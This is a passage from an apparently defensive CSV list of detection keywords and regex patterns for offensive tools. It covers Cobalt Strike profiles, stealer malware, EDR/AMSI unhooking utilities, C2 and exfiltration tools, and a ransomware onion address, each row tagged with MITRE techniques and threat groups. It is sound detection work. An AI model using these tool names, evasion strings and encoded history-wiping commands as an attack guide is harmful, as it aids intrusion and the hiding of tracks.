- T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","N/A","10","2341","232","2025-04-03T04:19:29Z","2020-03-30T07:03:47Z","61821"
"*UltraSnaffler.sln*",".{0,1000}UltraSnaffler\.sln.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","N/A","10","2341","232","2025-04-03T04:19:29Z","2020-03-30T07:03:47Z","61822"
"*UmaRex01/HookSentry*",".{0,1000}UmaRex01\/HookSentry.{0,1000}","offensive_tool_keyword","HookSentry","tool for inspecting system DLLs loaded into processes - looking for functions hooked from AV/EDR.","T1055.001 - T1055 - T1057","TA0007 - TA0005","N/A","N/A","Defense Evasion","https://github.com/UmaRex01/HookSentry","1","1","N/A","N/A","6","1","27","2","2025-04-02T12:30:58Z","2024-11-20T18:09:39Z","61835"
"*UMJjAiNUUtvNww0lBj9tzWegwphuIn6hNP9eeIDfOrcHJ3nozYFPT-Jl7WsmbmjZnQXUesoJkcJkpdYEdqgQFE6QZgjWVsLSSDonL28DYDVJ*",".{0,1000}UMJjAiNUUtvNww0lBj9tzWegwphuIn6hNP9eeIDfOrcHJ3nozYFPT\-Jl7WsmbmjZnQXUesoJkcJkpdYEdqgQFE6QZgjWVsLSSDonL28DYDVJ.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","61836"
"*umutcamliyurt/PingRAT*",".{0,1000}umutcamliyurt\/PingRAT.{0,1000}","offensive_tool_keyword","PingRAT","secretly passes Command and Control (C2) traffic through firewalls using ICMP payloads","T1071.004 - T1573.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/umutcamliyurt/PingRAT","1","1","N/A","N/A","10","10","416","55","2023-09-29T22:26:15Z","2023-09-29T22:07:46Z","61838"
"*UmVkIFRlYW1pbmcgYW5kIE9mZmVuc2l2ZSBTZWN1cml0eSAg*",".{0,1000}UmVkIFRlYW1pbmcgYW5kIE9mZmVuc2l2ZSBTZWN1cml0eSAg.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","61839"
"*UmVmbGVjdGl2ZSBETEwgaW5qZWN0aW9u*",".{0,1000}UmVmbGVjdGl2ZSBETEwgaW5qZWN0aW9u.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","0","#base64","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","61840"
"*UmVmbGVjdGl2ZSBETEwgT1NTIEJ1Y2tldA==*",".{0,1000}UmVmbGVjdGl2ZSBETEwgT1NTIEJ1Y2tldA\=\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","0","#base64","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","61841"
"*UmVmbGVjdGl2ZSBETEwgUGF0aA==*",".{0,1000}UmVmbGVjdGl2ZSBETEwgUGF0aA\=\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","0","#base64","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","61842"
"*UmVmbGVjdGl2ZSBETEwgVVJJ*",".{0,1000}UmVmbGVjdGl2ZSBETEwgVVJJ.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","0","#base64","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","61843"
"*UmVmbGVjdGl2ZSBJbmplY3QgUHJvY2VzcyBJZA==*",".{0,1000}UmVmbGVjdGl2ZSBJbmplY3QgUHJvY2VzcyBJZA\=\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","0","#base64","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","61844"
"*UmVtb3ZlLUl0ZW0gKEdldC1QU3JlYWRsaW5lT3B0aW9uKS5IaXN0b3J5U2F2ZVBhdGggLUZvcmNlIC1FcnJvckFjdGlvbiBTaWxlbnRseUNvbnRpbnVl*",".{0,1000}UmVtb3ZlLUl0ZW0gKEdldC1QU3JlYWRsaW5lT3B0aW9uKS5IaXN0b3J5U2F2ZVBhdGggLUZvcmNlIC1FcnJvckFjdGlvbiBTaWxlbnRseUNvbnRpbnVl.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","61845"
"*Un1k0d3r/SCShell*",".{0,1000}Un1k0d3r\/SCShell.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","N/A","10","10","1484","248","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z","61846"
"*Unable to inject 64-bit shellcode from within 32-bit Powershell*",".{0,1000}Unable\sto\sinject\s64\-bit\sshellcode\sfrom\swithin\s32\-bit\sPowershell.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","61847"
"*uname=FUZZ&pass=FUZZ*",".{0,1000}uname\=FUZZ\&pass\=FUZZ.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","61849"
"*Unblock-File .\install.ps1*",".{0,1000}Unblock\-File\s\.\\install\.ps1.{0,1000}","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","0","N/A","N/A","N/A","10","7168","1313","2024-09-24T19:14:18Z","2019-03-26T22:36:32Z","61850"
"*Unconstrained_Delegation_Systems.txt*",".{0,1000}Unconstrained_Delegation_Systems\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","61851"
"*unDefender-master*",".{0,1000}unDefender\-master.{0,1000}","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","1","N/A","N/A","10","4","358","81","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z","61852"
"*undertheradar-main*",".{0,1000}undertheradar\-main.{0,1000}","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","1","N/A","N/A","9","1","11","2","2023-10-08T23:31:33Z","2023-07-01T17:59:20Z","61853"
"*undgrddapc4reaunnrdrmnagvdelqfvmgycuvilgwb5uxm25sxawaoqd.onion*",".{0,1000}undgrddapc4reaunnrdrmnagvdelqfvmgycuvilgwb5uxm25sxawaoqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","61854"
"*Unhandled Rubeus exception:*",".{0,1000}Unhandled\sRubeus\sexception\:.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","61855"
"*unhide-implant*",".{0,1000}unhide\-implant.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","61856"
"*unhook kernel32*",".{0,1000}unhook\skernel32.{0,1000}","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","0","N/A","N/A","10","10","1109","180","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z","61857"
"*unhook wldp amsi*",".{0,1000}unhook\swldp\samsi.{0,1000}","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","0","N/A","N/A","10","10","1109","180","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z","61858"
"*unhook_ntdll(remote_process*",".{0,1000}unhook_ntdll\(remote_process.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#content","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","61859"
"*UnhookingKnownDlls.*",".{0,1000}UnhookingKnownDlls\..{0,1000}","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","1","N/A","N/A","9","2","188","38","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z","61860"
"*UnhookingNtdll_disk.*",".{0,1000}UnhookingNtdll_disk\..{0,1000}","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","1","N/A","N/A","9","2","188","38","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z","61861"
"*UnhookingPatch-main*",".{0,1000}UnhookingPatch\-main.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","1","N/A","N/A","8","4","304","52","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z","61862"
"*UnhookingPatch-main*",".{0,1000}UnhookingPatch\-main.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","1","N/A","N/A","9","4","304","52","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z","61863"
"*UniByAv*",".{0,1000}UniByAv.{0,1000}","offensive_tool_keyword","UniByAv","UniByAv is a simple obfuscator that take raw shellcode and generate executable that are Anti-Virus friendly. The obfuscation routine is purely writtend in assembly to remain pretty short and efficient. In a nutshell the application generate a 32 bits xor key and brute force the key at run time then perform the decryption of the actually shellcode.","T1027 - T1059 - T1029","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/UniByAv","1","1","N/A","N/A","N/A","3","N/A","N/A","N/A","N/A","61864"
"*unicorn.py *",".{0,1000}unicorn\.py\s.{0,1000}","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/trustedsec/unicorn","1","0","N/A","N/A","N/A","10","3818","816","2024-01-24T20:02:33Z","2013-06-19T08:38:06Z","61865"
"*unicorn-master.zip*",".{0,1000}unicorn\-master\.zip.{0,1000}","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/trustedsec/unicorn","1","1","N/A","N/A","N/A","10","3818","816","2024-01-24T20:02:33Z","2013-06-19T08:38:06Z","61866"
"*Uninstall-SQLC2AgentPs*",".{0,1000}Uninstall\-SQLC2AgentPs.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","61871"
"*Uninstall-SQLC2Server*",".{0,1000}Uninstall\-SQLC2Server.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","61872"
"*Unit-259/DataBouncing*",".{0,1000}Unit\-259\/DataBouncing.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","1","N/A","N/A","9","1","15","0","2025-03-12T07:34:04Z","2025-03-12T06:58:51Z","61874"
"*unix/1.0 UPnP/1.1 masscan/*",".{0,1000}unix\/1\.0\sUPnP\/1\.1\smasscan\/.{0,1000}","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","Black Basta - Unit 29155 - Akira - EMBER BEAR","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","N/A","10","24345","3118","2024-12-13T12:22:18Z","2013-07-28T05:35:33Z","61877"
"*unix_cached_ad_hashes.rb*",".{0,1000}unix_cached_ad_hashes\.rb.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","1","#linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","61878"
